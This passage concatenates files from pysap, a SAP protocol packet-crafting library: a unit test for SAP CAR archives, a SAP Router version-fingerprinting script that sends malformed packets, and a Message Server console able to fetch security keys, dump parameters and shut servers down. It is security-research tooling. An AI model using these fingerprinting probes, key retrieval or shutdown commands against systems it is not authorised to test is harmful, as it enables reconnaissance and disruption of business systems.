# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import unittest
from os import unlink
from os.path import basename, exists
# External imports
# Custom imports
from tests.utils import data_filename
from pysap.SAPCAR import (SAPCARArchive, SAPCARArchiveFile,
                          SAPCAR_VERSION_200, SAPCAR_VERSION_201)


class PySAPCARTest(unittest.TestCase):

    test_archive_file = "somefile"
    test_filename = "test_string.txt"
    test_timestamp_raw = 1449010128
    test_timestamp = "01 Dec 2015 22:48"
    test_perm_mode = 33204
    test_permissions = "-rw-rw-r--"
    test_string = "The quick brown fox jumps over the lazy dog"

    def setUp(self):
        with open(self.test_filename, "wb") as fd:
            fd.write(self.test_string)

    def tearDown(self):
        for filename in [self.test_filename, self.test_archive_file]:
            if exists(filename):
                unlink(filename)

    def check_sapcar_archive(self, filename, version):
        """Test SAP CAR archive file"""

        with open(data_filename(filename), "rb") as fd:
            sapcar_archive = SAPCARArchive(fd, mode="r")

            self.assertEqual(filename, basename(sapcar_archive.filename))
            self.assertEqual(version, sapcar_archive.version)
            self.assertEqual(1, len(sapcar_archive.files))
            self.assertEqual(1, len(sapcar_archive.files_names))
            self.assertListEqual([self.test_filename], sapcar_archive.files_names)
            self.assertListEqual([self.test_filename], sapcar_archive.files.keys())

            af = sapcar_archive.open(self.test_filename)
            self.assertEqual(self.test_string, af.read())
            af.close()

            ff = sapcar_archive.files[self.test_filename]
            self.assertEqual(len(self.test_string), ff.size)
            self.assertEqual(self.test_filename, ff.filename)
            self.assertEqual(self.test_timestamp, ff.timestamp)
            self.assertEqual(self.test_timestamp_raw, ff.timestamp_raw)
            self.assertEqual(self.test_permissions, ff.permissions)
            self.assertEqual(self.test_perm_mode, ff.perm_mode)
            self.assertEqual(version, ff.version)
            self.assertTrue(ff.is_file())
            self.assertFalse(ff.is_directory())

            self.assertTrue(ff.check_checksum())
            self.assertEqual(ff.calculate_checksum(self.test_string), ff.checksum)

            af = ff.open()
            self.assertEqual(self.test_string, af.read())
            af.close()

    def test_sapcar_archive(self):
        """Test some basic construction of a SAP CAR archive"""

        self.assertRaises(ValueError, SAPCARArchive, self.test_archive_file, "w", version="2.02")
        self.assertRaises(ValueError, SAPCARArchive, self.test_archive_file, "x")

    def test_sapcar_archive_200(self):
        """Test SAP CAR archive file version 2.00"""

        self.check_sapcar_archive("car200_test_string.sar", SAPCAR_VERSION_200)

    def test_sapcar_archive_201(self):
        """Test SAP CAR archive file version 2.01"""

        self.check_sapcar_archive("car201_test_string.sar", SAPCAR_VERSION_201)

    def test_sapcar_archive_add_file(self):
        """Test some basic construction of a SAP CAR archive adding from an existent file"""

        ar = SAPCARArchive(self.test_archive_file, "w")
        ar.add_file(self.test_filename)
        ar.add_file(self.test_filename, archive_filename=self.test_filename+"two")

        self.assertEqual("2.01", ar.version)
        self.assertEqual(2, len(ar.files))
        self.assertEqual(2, len(ar.files_names))
        self.assertListEqual([self.test_filename, self.test_filename+"two"], ar.files_names)
        self.assertListEqual([self.test_filename, self.test_filename+"two"], ar.files.keys())

        for filename in [self.test_filename, self.test_filename+"two"]:
            af = ar.open(filename)
            self.assertEqual(self.test_string, af.read())
            af.close()

            ff = ar.files[filename]
            self.assertEqual(len(self.test_string), ff.size)
            self.assertEqual(filename, ff.filename)

            self.assertTrue(ff.check_checksum())
            self.assertEqual(ff.calculate_checksum(self.test_string), ff.checksum)

            af = ff.open()
            self.assertEqual(self.test_string, af.read())
            af.close()

    def test_sapcar_archive_file_from_file(self):
        """Test SAP CAR archive file object construction from file using the original name
        and a different one"""
        ff = SAPCARArchiveFile.from_file(self.test_filename)
        self.assertEqual(len(self.test_string), ff.size)
        self.assertEqual(self.test_filename, ff.filename)
        self.assertTrue(ff.check_checksum())

        af = ff.open()
        self.assertEqual(self.test_string, af.read())
        af.close()

        test_filename_new = "some_other_filename.txt"
        ff = SAPCARArchiveFile.from_file(self.test_filename, archive_filename=test_filename_new)
        self.assertEqual(len(self.test_string), ff.size)
        self.assertEqual(test_filename_new, ff.filename)
        self.assertTrue(ff.check_checksum())

        af = ff.open()
        self.assertEqual(self.test_string, af.read())
        af.close()

    def test_sapcar_archive_file_200_to_201(self):
        """Test SAP CAR archive file object conversion from 2.00 to 2.01"""

        with open(data_filename("car200_test_string.sar"), "rb") as fd200:
            ar200 = SAPCARArchive(fd200, mode="r")
            ff200 = ar200.files[self.test_filename]
            ff201 = SAPCARArchiveFile.from_archive_file(ff200, SAPCAR_VERSION_201)

            self.assertEqual(ff200.size, ff201.size)
            self.assertEqual(ff200.filename, ff201.filename)
            self.assertEqual(ff200.timestamp, ff201.timestamp)
            self.assertEqual(ff200.timestamp_raw, ff201.timestamp_raw)
            self.assertEqual(ff200.permissions, ff201.permissions)
            self.assertEqual(ff200.perm_mode, ff201.perm_mode)
            self.assertEqual(ff200.checksum, ff201.checksum)
            self.assertIs(ff200.is_file(), ff201.is_file())
            self.assertIs(ff200.is_directory(), ff201.is_directory())

            af = ff201.open()
            self.assertEqual(self.test_string, af.read())
            af.close()

    def test_sapcar_archive_200_to_201(self):
        """Test SAP CAR archive object conversion from 2.00 to 2.01"""

        with open(data_filename("car200_test_string.sar"), "rb") as fd:
            ar = SAPCARArchive(fd, mode="r")
            ff200 = ar.files[self.test_filename]

            ar.version = SAPCAR_VERSION_201
            ff201 = ar.files[self.test_filename]

            self.assertEqual(ff200.size, ff201.size)
            self.assertEqual(ff200.filename, ff201.filename)
            self.assertEqual(ff200.timestamp, ff201.timestamp)
            self.assertEqual(ff200.timestamp_raw, ff201.timestamp_raw)
            self.assertEqual(ff200.permissions, ff201.permissions)
            self.assertEqual(ff200.perm_mode, ff201.perm_mode)
            self.assertEqual(ff200.checksum, ff201.checksum)
            self.assertIs(ff200.is_file(), ff201.is_file())
            self.assertIs(ff200.is_directory(), ff201.is_directory())

            af = ff201.open()
            self.assertEqual(self.test_string, af.read())
            af.close()

    def test_sapcar_archive_201_to_200(self):
        """Test SAP CAR archive object conversion from 2.01 to 2.00"""

        with open(data_filename("car201_test_string.sar"), "rb") as fd:
            ar = SAPCARArchive(fd, mode="r")
            ff201 = ar.files[self.test_filename]

            ar.version = SAPCAR_VERSION_200
            ff200 = ar.files[self.test_filename]

            self.assertEqual(ff200.size, ff201.size)
            self.assertEqual(ff200.filename, ff201.filename)
            self.assertEqual(ff200.timestamp, ff201.timestamp)
            self.assertEqual(ff200.timestamp_raw, ff201.timestamp_raw)
            self.assertEqual(ff200.permissions, ff201.permissions)
            self.assertEqual(ff200.perm_mode, ff201.perm_mode)
            self.assertEqual(ff200.checksum, ff201.checksum)
            self.assertIs(ff200.is_file(), ff201.is_file())
            self.assertIs(ff200.is_directory(), ff201.is_directory())

            af = ff200.open()
            self.assertEqual(self.test_string, af.read())
            af.close()


def test_suite():
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(PySAPCARTest))
    return suite


if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(test_suite())



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security Technologies.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import json
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers, Raw
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket, SAPNI
from pysap.SAPRouter import SAPRouter, SAPRouterRouteHop, SAPRouterError


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = "This example script connects with a SAP Router service and tries to determine its version. " \
                  "Finger printing is performed by triggering different errors and looking at the lines where the " \
                  "error is produced."

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog -d <remote host> [options]"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", default="127.0.0.1",
                      help="Remote host [%default]")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", default=3299,
                      help="Remote port [%default]")
    parser.add_option_group(target)

    database = OptionGroup(parser, "Database options")
    database.add_option("-f", "--fingerprints-file", dest="fingerprints", metavar="FILE",
                        default="router_fingerprints.json", help="Fingerprints file to use [%default]")
    database.add_option("-a", "--add-fingerprint", dest="add_fingerprint", action="store_true", default=False,
                        help="New fingerprint to add to the database in json format")
    database.add_option("-i", "--version-information", dest="version_info",
                        help="Version information to use when adding new entries in json format")
    database.add_option("-n", "--new-entries", dest="new_entries", action="store_true", default=False,
                        help="Generate new database entries even when the fingerprints matched")
    database.add_option("--new-fingerprints-file", dest="new_fingerprint_file", metavar="FILE",
                        default="saprouter_new_fingerprints.json", help="File to write or load from new fingerprints")
    parser.add_option_group(database)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
                    help="Verbose output [%default]")

    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# This is the list of fields we want to track when checking for fingerprints
fingerprint_fields = ["error", "return_code", "component", "release", "version", "module", "line", "errorno",
                      "errorno_text", "system_call"]


# The fields used to identify a version being fingerprinted
version_info_fields = ["version", "release", "patch_number", "source_id", "update_level", "file_version", "platform",
                       "submitted_by", "comment"]


# This is the list of target packets that we use during the fingerprinting. Basically it consist of a dict with the
# key being the name of the target packet and the value the construction of it.
fingerprint_targets = {
    # Connect to the SAP Route but not send any packet to trigger a timeout
    "Timeout": None,
    # Send a large packet
    "Network packet too big": Raw("X" * 10025),
    # Use an invalid opcode
    "Invalid control opcode": SAPRouter(type=SAPRouter.SAPROUTER_CONTROL, version=38, opcode=3),
    # Do not send a route
    "No route": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE),
    # Set one entry but do no provide a route
    "No route one entry": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                    route_entries=1),
    # Set one entry with an invalid length but do no provide it
    "No route invalid length": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                         route_entries=2,
                                         route_rest_nodes=1,
                                         route_length=1,
                                         route_offset=3),
    # Set one entry with an invalid route
    "Empty route invalid length": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                            route_entries=2,
                                            route_rest_nodes=1,
                                            route_length=1,
                                            route_offset=0,
                                            route_string=[SAPRouterRouteHop()]),
    # Set an empty route with valid length
    "Empty route valid length": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                          route_entries=2,
                                          route_rest_nodes=1,
                                          route_length=6,
                                          route_offset=3,
                                          route_string=[SAPRouterRouteHop(), SAPRouterRouteHop()]),
    # Set an empty route with a null offset
    "Empty route null offset": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,route_entries=2,
                                         route_rest_nodes=1,
                                         route_length=6,
                                         route_offset=0,
                                         route_string=[SAPRouterRouteHop(), SAPRouterRouteHop()]),
    # Set an empty route with an invalid offset
    "Empty route invalid offset": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                            route_entries=2,
                                            route_rest_nodes=1,
                                            route_length=6,
                                            route_offset=6,
                                            route_string=[SAPRouterRouteHop(), SAPRouterRouteHop()]),
    # Set a route for a non existent domain
    "Non existent domain": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                     route_entries=2,
                                     route_rest_nodes=1,
                                     route_length=38,
                                     route_offset=19,
                                     route_string=[SAPRouterRouteHop(hostname="non.existent.dom"),
                                                   SAPRouterRouteHop(hostname="non.existent.dom")]),
    # Valid route for an non existent domain with an old version
    "Non existent domain old version": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                                 route_ni_version=0,
                                                 route_entries=2,
                                                 route_rest_nodes=1,
                                                 route_length=38,
                                                 route_offset=19,
                                                 route_string=[SAPRouterRouteHop(hostname="non.existent.dom"),
                                                               SAPRouterRouteHop(hostname="non.existent.dom")]),
    # Valid route for a valid domain but an invalid service name
    "Valid domain invalid service": SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                              route_entries=2,
                                              route_rest_nodes=1,
                                              route_length=56,
                                              route_offset=28,
                                              route_string=[SAPRouterRouteHop(hostname="www.coresecurity.com",
                                                                              port="someservice"),
                                                            SAPRouterRouteHop(hostname="www.coresecurity.com",
                                                                              port="someservice")]),
}


class FingerprintDB(object):

    def __init__(self, fingerprints_file):
        self.fingerprints_db = {}
        self.fingerprints_file = fingerprints_file
        self.load_fingerprints(fingerprints_file)

    def load_fingerprints(self, fingerprints_file):
        with open(fingerprints_file, 'r') as f:
            fingerprints = json.load(f)

        for target in fingerprint_targets:
            if target in fingerprints:
                self.fingerprints_db[target] = fingerprints[target]

    def add_fingerprint(self, new_fingerprint, version_info):
        with open(new_fingerprint, 'r') as f:
            new_fingerprint = json.load(f)
        if version_info:
            version_info = json.loads(version_info)
        else:
            version_info = {}

        for target in fingerprint_targets:
            if target in new_fingerprint:
                if target not in self.fingerprints_db:
                    self.fingerprints_db[target] = []
                for entry in new_fingerprint[target]:
                    entry.update(version_info)
                    if entry not in self.fingerprints_db[target]:
                        print("[*]\tAdded a new entry for the target %s" % target)
                        self.fingerprints_db[target].append(entry)

        with open(self.fingerprints_file, 'w') as f:
            json.dump(self.fingerprints_db, f, sort_keys=True, indent=4, separators=(',', ': '))

    def match_fingerprint(self, target, error_text):
        matches = []
        if target in self.fingerprints_db:
            for finger in self.fingerprints_db[target]:
                match = True
                for key, value in list(finger.items()):
                    if key in fingerprint_fields and hasattr(error_text, key) and getattr(error_text, key) != value:
                        match = False
                        print("[ ]\tUnmatched field: \"%s\" Value: \"%s\" vs \"%s\"" % (key, value, getattr(error_text,
                                                                                                            key)))
                if match:
                    matches.append(finger)
        return matches


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Loading fingerprint database")
    fingerprint_db = FingerprintDB(options.fingerprints)

    # Check if we were asked to add a new fingerprint
    if options.add_fingerprint:
        if not options.version_info:
            print("[-] You must provide version info to add new entries to the fingerprint database !")
            return
        print("[*] Adding a new entry to the fingerprint database")
        fingerprint_db.add_fingerprint(options.new_fingerprint_file, options.version_info)
        return

    misses = []
    matches = []
    print("[*] Trying to fingerprint version using %d packets" % (len(fingerprint_targets)))

    # Trigger some errors and check with fingerprint db
    l = len(fingerprint_targets)
    i = 1
    for (target, packet) in list(fingerprint_targets.items()):

        print("[*] (%d/%d) Fingerprint for packet '%s'" % (i, l, target))

        # Initiate the connection and send the packet
        conn = SAPNIStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              keep_alive=False)
        if packet is None:  # Timeout error
            error_text = conn.recv().err_text_value
        else:
            error_text = conn.sr(packet).err_text_value

        matched = fingerprint_db.match_fingerprint(target, error_text)

        if matched:
            print("[*] (%d/%d) Fingerprint for packet '%s' matched !" % (i, l, target))
            matches.append((target, matched))
        else:
            print("[*] (%d/%d) Fingerprint for packet '%s' not matched" % (i, l, target))
            misses.append((target, error_text))

        i += 1

    if matches:
        versions = []
        counts = {}
        print("\n[*] Matched fingerprints (%d/%d):" % (len(matches), l))
        for (target, fingerprints) in matches:
            print("[+] Request: %s" % target)
            for fingerprint in fingerprints:
                match = {}
                for field in version_info_fields:
                    if field in fingerprint:
                        match[field] = fingerprint[field]
                if match not in versions:
                    counts[str(match)] = 0
                    versions.append(match)
                counts[str(match)] += 1

        print("\n[*] Probable versions (%d):" % len(versions))
        for version in versions:
            msg = " ".join(["%s: \"%s\"" % (field, version[field]) for field in version_info_fields
                            if version[field] != ""])
            print("[*]\tHits: %d Version: %s" % (counts[str(version)], msg))

    if misses:
        print("\n[*] Non matched fingerprints (%d/%d):" % (len(misses), l))
        for (target, _) in misses:
            print("[-] Request: %s" % target)

        print("\n[-] Some error values where not found in the fingerprint database. "
              "If you want to contribute submit a issue to https://github.com/CoreSecurity/pysap "
              "or write an email to mgallo@coresecurity.com with the following information along "
              "with the SAP Router file information and how it was configured.\n")
        options.new_entries = True

    # Build new entries for the fingerprint database
    if options.new_entries:
        new_fingerprint = {}
        for (target, error_text) in misses:
            new_fingerprint[target] = [{}]
            for field in fingerprint_fields:
                new_fingerprint[target][0][field] = getattr(error_text, field)
        # Expand with matched targets also
        for (target, fingerprint) in matches:
            new_fingerprint[target] = fingerprint

        print("\nNew fingerprint saved to: %s" % options.new_fingerprint_file)
        with open(options.new_fingerprint_file, 'w') as f:
            json.dump(new_fingerprint, f)

        version_info = {"patch_number": "",
                        "source_id": "",
                        "update_level": "",
                        "file_version": "",
                        "platform": "",
                        "submitted_by": "",
                        "comment": "",
                        }
        print("\n\nVersion information to complete and submit:")
        print("%s" % json.dumps(version_info, indent=4))


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2017 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.utils import BaseConsole
from pysap.SAPMS import (SAPMS, ms_client_status_values, ms_opcode_error_values,
                         ms_dump_command_values, SAPMSCounter, ms_opcode_values,
                         ms_errorno_values, SAPMSProperty, ms_property_id_values,
                         SAPMSAdmRecord)
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


class SAPMSMonitorConsole(BaseConsole):

    intro = "SAP MS Monitor Console"
    connection = None
    connected = False
    clients = []

    def __init__(self, options):
        super(SAPMSMonitorConsole, self).__init__(options)
        self.runtimeoptions["client_string"] = self.options.client

    # Initialization
    def preloop(self):
        super(SAPMSMonitorConsole, self).preloop()
        self.do_connect(None)
        self.do_client_list(None)

    # Helper for crafting packets
    def _build(self, flag, iflag, **args):
        return SAPMS(flag=flag, iflag=iflag,
                     toname=self.runtimeoptions["server_string"],
                     fromname=self.runtimeoptions["client_string"],
                     **args)

    # Helper for sending simple commands and opcodes
    def _send_simple(self, flag, iflag, **args):
        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        if "opcode" in args:
            opcode_name = ms_opcode_values[args["opcode"]] + " "
        else:
            opcode_name = ""

        p = self._build(flag, iflag, **args)

        self._debug("Sending %spacket" % opcode_name)
        response = self.connection.sr(p)[SAPMS]

        if response.opcode_error != 0:
            self._print("Error: %s" % ms_opcode_error_values[response.opcode_error])
            return None
        else:
            return response

    # SAP MS Monitor commands

    def do_connect(self, args):
        """ Initiate the connection to the Message Server service. The
        connection is registered using the client_string runtime option. """

        # Create the socket connection
        try:
            self.connection = SAPRoutedStreamSocket.get_nisocket(self.options.remote_host,
                                                                 self.options.remote_port,
                                                                 self.options.route_string,
                                                                 base_cls=SAPMS)
        except SocketError as e:
            self._error("Error connecting with the Message Server")
            self._error(str(e))
            return

        self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port))

        # Send MS_LOGIN_2 packet
        p = SAPMS(flag=0x00, iflag=0x08, toname=self.runtimeoptions["client_string"],
                  fromname=self.runtimeoptions["client_string"])

        self._debug("Sending login packet")
        response = self.connection.sr(p)[SAPMS]

        if response.errorno == 0:
            self.runtimeoptions["server_string"] = response.fromname
            self._debug("Login performed, server string: %s" % response.fromname)
            self._print("pysap's Message Server monitor, connected to %s / %d" % (self.options.remote_host,
                                                                                  self.options.remote_port))
            self.connected = True
        else:
            if response.errorno in ms_errorno_values:
                self._error("Error performing login: %s" % ms_errorno_values[response.errorno])
            else:
                self._error("Unknown error performing login: %d" % response.errorno)

    def do_disconnect(self, args):
        """ Disconnects from the Message Server service. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send MS_LOGOUT packet
        p = self._build(0x00, 0x04)
        self._debug("Sending logout packet")
        self.connection.send(p)

        self.connection.close()
        self._print("Dettached from %s / %d ..." % (self.options.remote_host, self.options.remote_port))

        self.connected = False

    def do_exit(self, args):
        if self.connected:
            self.do_disconnect(None)
        return super(SAPMSMonitorConsole, self).do_exit(args)

    def do_client_list(self, args):
        """ Retrieve the list of clients connected to the Message Server
        service. Use the client # value when required to provide a client
        IDs as parameter. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send MS_SERVER_LONG_LIST packet
        p = self._build(0x01, 0x01, opcode=0x40, opcode_charset=0x00)
        self._debug("Sending server long list packet")
        self.connection.send(p)

        # Send MS_SERVER_LST packet
        response = self._send_simple(0x02, 0x01, opcode=0x05, opcode_version=0x68)

        # Print clients table
        table = [["#", "Client Name", "Host", "Service", "IPv4", "IPv6", "ServNo", "State", "Services"]]
        instance = self.runtimeoptions["server_string"]
        i = 0
        for client in response.clients:
            if client.status == 1:
                instance = client.client
            table.append([str(i),
                          client.client,
                          client.host,
                          client.service,
                          client.hostaddrv4,
                          client.hostaddrv6 if "hostaddrv6" in client.fields else None,
                          str(client.servno),
                          ms_client_status_values[client.status]])
            i += 1
        self._tabulate(table)

        # Store clients for further use
        self.clients = response.clients

        self._debug("Server instance: %s" % instance)
        self.runtimeoptions["instance"] = instance

    def do_hardware_id(self, args):
        """ Retrieve the installation's hardware ID. """
        response = self._send_simple(0x02, 0x01, opcode=0x0a)
        if response:
            self._print("Hardware ID: %s" % response.hwid)

    def do_get_security_by_name(self, args):
        """ Get Security Key by name. """
        response = self._send_simple(0x02, 0x01, opcode=0x08, security_name=args)
        if response:
            self._print("Security Name: %s" % response.security_name)
            self._print("Security Key: %s" % response.security_key)

    def do_get_security_by_ip(self, args):
        """ Get Security Key by ip/port. Options <IPv4 address> <port> """

        try:
            ip, port = args.split(" ")
            port = int(port)
        except ValueError:
            self._error("Wrong parameters !")
            return

        # Send MS_GET_SECURITY
        response = self._send_simple(0x02, 0x01, opcode=0x09, security2_addressv4=ip, security2_port=port)
        if response:
            self._print("Security IPv4 Address: %s" % response.security2_addressv4)
            self._print("Security Port: %s" % response.security2_port)
            self._print("Security Key: %s" % response.security2_key)
            self._print("Security IPv6 Address: %s" % response.security2_addressv6)

    def do_dump(self, args):
        """ Dump information. Options [<dump command> | all] """

        if args == "all":
            for key in ms_dump_command_values:
                self.do_dump(key)
            return

        # Split list of commands
        try:
            args = args.split(" ")
        except AttributeError:
            args = [args]

        try:
            command = int(args[0])
        except ValueError:
            self._error("Wrong dump command ! Valid values:")
            for key in ms_dump_command_values:
                self._error("%d: %s" % (key, ms_dump_command_values[key]))
            self._error("all: dumps all the available information")
            return

        if command == 1:  # MS_DUMP_MSADM
            try:
                client_id = int(args[1])
                client = self.clients[client_id]
            except (ValueError, KeyError, IndexError):
                self._error("Wrong parameters ! Specify client ID")
                return
            response = self._send_simple(0x02, 0x01, opcode=0x1e,
                                         dump_dest=0x02, dump_command=command,
                                         dump_name=client.client)
        elif command == 12:  # MS_DUMP_COUNTER
            try:
                counter = args[1]
            except IndexError:
                self._error("Wrong parameters ! Specify counter number")
                return
            response = self._send_simple(0x02, 0x01, opcode=0x1e,
                                         dump_dest=0x02, dump_command=command,
                                         dump_name=counter)
        else:
            # Send MS_DUMP_INFO
            response = self._send_simple(0x02, 0x01, opcode=0x1e, dump_dest=0x02, dump_command=command)

        if response:
            self._print("Dump information:\n%s" % response.opcode_value)

    def do_server_parameters(self, args):
        """ Dump server parameters. """
        self.do_dump("3")

    def do_server_release(self, args):
        """ Dump release information. """
        self.do_dump("8")

    def do_trace_increase(self, args):
        """ Increase server's trace level. """

        # Send MS_INCRE_TRACE
        response = self._send_simple(0x02, 0x01, opcode=0x0b)
        if response:
            self._print("Trace increased")

    def do_trace_decrease(self, args):
        """ Decrease server's trace level. """

        # Send MS_DECRE_TRACE
        response = self._send_simple(0x02, 0x01, opcode=0x0c)
        if response:
            self._print("Trace decreased")

    def do_trace_reset(self, args):
        """ Reset server's trace level. """

        # Send MS_RESET_TRACE
        response = self._send_simple(0x02, 0x01, opcode=0x0d)
        if response:
            self._print("Trace reset")

    def do_statistics_activate(self, args):
        """ Activates server's statistics. """

        # Send MS_ACT_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x0e)
        if response:
            self._print("Statistics activated")

    def do_statistics_deactivate(self, args):
        """ Deactivates server's statistics. """

        # Send MS_DEACT_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x0f)
        if response:
            self._print("Statistics deactivated")

    def do_statistics_reset(self, args):
        """ Reset server's statistics. """

        # Send MS_RESET_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x10)
        if response:
            self._print("Statistics reset")

    def do_statistics_get(self, args):
        """ Get server's statistics. """

        # Send MS_GET_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x11)
        # TODO: Statistics fields are not correctly defined, just showing the
        # complete packet now
        if response:
            response.show()

    def do_network_buffer_dump(self, args):
        """ Dump network buffer. """

        # Send MS_DUMP_NIBUFFER
        response = self._send_simple(0x02, 0x01, opcode=0x12)
        if response:
            self._print("Network buffer dumped")

    def do_network_buffer_reset(self, args):
        """ Reset network buffer. """

        # Send MS_RESET_NIBUFFER
        response = self._send_simple(0x02, 0x01, opcode=0x13)
        if response:
            self._print("Network buffer reset")

    def do_get_codepage(self, args):
        """ Get code page. """

        # Send MS_GET_CODEPAGE
        response = self._send_simple(0x02, 0x01, opcode=0x1c)
        if response:
            self._print("Codepage: %s" % response.codepage)

    def do_counter_list(self, args):
        """ List Counters. """

        # Send MS_COUNTER_LST
        response = self._send_simple(0x02, 0x01, opcode=0x2a)
        if response:
            self._print("Counters:\n%s" % response.counters)

    def _counter_opcodes(self, counter, opcode, count=0, number=0):
        """ Helper for counter commands. """

        c = SAPMSCounter(uuid=counter, count=count, no=number)
        response = self._send_simple(0x02, 0x01, opcode=opcode, counter=c)
        if response and response.counter:
            self._print("Counter UUID: %s Count: %d No: %d" % (response.counter.uuid,
                                                               response.counter.count,
                                                               response.counter.no))

    def do_counter_get(self, args):
        """ Get Counter. Options: <counter> """
        self._counter_opcodes(args, 0x29)

    def do_counter_create(self, args):
        """ Create Counter. Options: <counter> """
        self._counter_opcodes(args, 0x24)

    def do_counter_delete(self, args):
        """ Delete Counter. Options: <counter> """
        self._counter_opcodes(args, 0x25)

    def do_counter_increment(self, args):
        """ Increment Counter. Options: <counter> <value> """
        try:
            counter, count = args.split(" ")
            count = int(count)
        except ValueError:
            self._error("Invalid parameters !")
            return

        self._counter_opcodes(counter, 0x26, count=count)

    def do_counter_decrement(self, args):
        """ Decrement Counter. Options: <counter> <value> """
        try:
            counter, count = args.split(" ")
            count = int(count)
        except ValueError:
            self._error("Invalid parameters !")
            return

        self._counter_opcodes(counter, 0x27, count=count)

    def do_counter_register(self, args):
        """ Register Counter. Options: <counter> """
        self._counter_opcodes(args, 0x28)

    def do_server_disconnect(self, args):
        """ Server disconnect. Options: <client id> <reason> """

        try:
            client_id, reason = args.split(" ", 2)
            client_id = int(client_id)
            client = self.clients[client_id]
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            self.do_client_list(None)
            return

        # Send MS_SERVER_DISC packet
        response = self._send_simple(0x02, 0x01, opcode=0x2e,
                                     shutdown_client=client,
                                     shutdown_reason=reason)
        if response:
            self._print("Disconnected from server")

    def do_server_shutdown(self, args):
        """ Server shutdown. Options: <client id> <reason> """

        try:
            client_id, reason = args.split(" ", 2)
            client_id = int(client_id)
            client = self.clients[client_id]
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            self.do_client_list(None)
            return

        # Send MS_SERVER_SHUTDOWN packet
        response = self._send_simple(0x02, 0x01, opcode=0x2f,
                                     shutdown_client=client,
                                     shutdown_reason=reason)
        if response:
            self._print("Server shutdown")

    def do_server_soft_shutdown(self, args):
        """ Server soft shutdown. Options: <client id> <reason> """

        try:
            client_id, reason = args.split(" ", 2)
            client_id = int(client_id)
            client = self.clients[client_id]
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            self.do_client_list(None)
            return

        # Send MS_SERVER_SOFT_SHUTDOWN packet
        response = self._send_simple(0x02, 0x01, opcode=0x30,
                                     shutdown_client=client,
                                     shutdown_reason=reason)
        if response:
            self._print("Server soft shutdown")

    def do_property_get(self, args):
        """ Get property. Options: <client id> <prop id> """

        try:
            prop_client, prop_id = args.split(" ")
            prop_client = self.clients[int(prop_client)]
            prop_id = int(prop_id)
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            return

